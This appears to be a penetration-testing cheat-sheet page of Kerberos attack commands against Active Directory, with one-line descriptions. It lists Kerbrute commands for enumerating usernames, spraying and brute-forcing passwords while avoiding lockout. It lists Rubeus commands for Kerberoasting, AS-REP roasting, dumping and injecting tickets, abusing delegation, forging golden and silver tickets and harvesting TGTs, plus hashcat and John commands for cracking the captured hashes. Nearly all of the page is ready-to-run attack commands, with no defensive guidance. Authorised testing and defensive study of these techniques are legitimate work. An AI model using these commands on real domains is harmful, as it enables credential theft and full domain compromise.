active-directory

Kerbrute & Rubeus — Kerberos Attacks

Kerbrute for username enumeration and password spraying; Rubeus as a full Kerberos attack toolkit.

Apr 2026 lazyhackers
Kerbrute (5)
kerbrute userenum --dc 10.10.10.1 -d domain.local users.txt
Enumerate valid usernames via Kerberos pre-auth
kerbrute userenum users
kerbrute passwordspray --dc 10.10.10.1 -d domain.local users.txt "Password1"
Password spray single password against user list
kerbrute spray password
kerbrute bruteuser --dc 10.10.10.1 -d domain.local rockyou.txt administrator
Brute force specific user
kerbrute bruteforce
kerbrute userenum --dc 10.10.10.1 -d domain.local users.txt -o valid_users.txt
Save valid users to file
kerbrute userenum output
kerbrute passwordspray --dc 10.10.10.1 -d domain.local users.txt "Summer2024!" --delay 1000
Spray with 1-second delay (avoid lockout)
kerbrute spray lockout
Rubeus — Kerberoasting & AS-REP Roasting (5)
Rubeus.exe kerberoast /outfile:hashes.txt
Kerberoast all SPNs in domain
rubeus kerberoast spn
Rubeus.exe kerberoast /user:svc_sql /outfile:hash.txt
Kerberoast specific service account
rubeus kerberoast
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
Kerberoast with RC4 only (opsec-safe)
rubeus kerberoast opsec
Rubeus.exe asreproast /outfile:asrep.txt
AS-REP Roast all users without pre-auth
rubeus asrep
Rubeus.exe asreproast /user:nopreauth_user /format:hashcat /outfile:asrep.txt
AS-REP Roast in hashcat format
rubeus asrep hashcat
Rubeus — Ticket Attacks (8)
Rubeus.exe dump /luid:0x3e4
Dump Kerberos tickets from memory (LUID)
rubeus tickets dump
Rubeus.exe dump /service:krbtgt /nowrap
Dump TGT tickets
rubeus tgt dump
Rubeus.exe ptt /ticket:ticket.kirbi
Pass-the-Ticket — inject .kirbi ticket
rubeus ptt
Rubeus.exe ptt /ticket:base64encodedticket
Pass-the-Ticket from base64 ticket
rubeus ptt base64
Rubeus.exe s4u /user:svc_account /rc4:HASH /impersonateuser:administrator /msdsspn:cifs/server.domain.local
S4U2Proxy — constrained delegation abuse
rubeus s4u delegation
Rubeus.exe golden /rc4:KRBTGT_HASH /domain:domain.local /sid:S-1-5-21-xxx /user:administrator
Create Golden Ticket
rubeus golden-ticket
Rubeus.exe silver /rc4:SERVICE_HASH /domain:domain.local /sid:S-1-5-21-xxx /user:administrator /service:cifs/server
Create Silver Ticket
rubeus silver-ticket
Rubeus.exe harvest /interval:30
Harvest TGTs every 30 seconds
rubeus harvest tgt
Cracking Kerberos Hashes (4)
hashcat -m 13100 kerb_hashes.txt rockyou.txt
Crack Kerberoast TGS hashes (RC4)
hashcat crack kerberoast
hashcat -m 19600 kerb_hashes.txt rockyou.txt
Crack Kerberoast TGS hashes (AES128)
hashcat crack kerberoast aes
hashcat -m 18200 asrep_hashes.txt rockyou.txt
Crack AS-REP Roast hashes
hashcat crack asrep
john kerb_hashes.txt --wordlist=rockyou.txt --format=krb5tgs
Crack Kerberoast with John
john crack kerberoast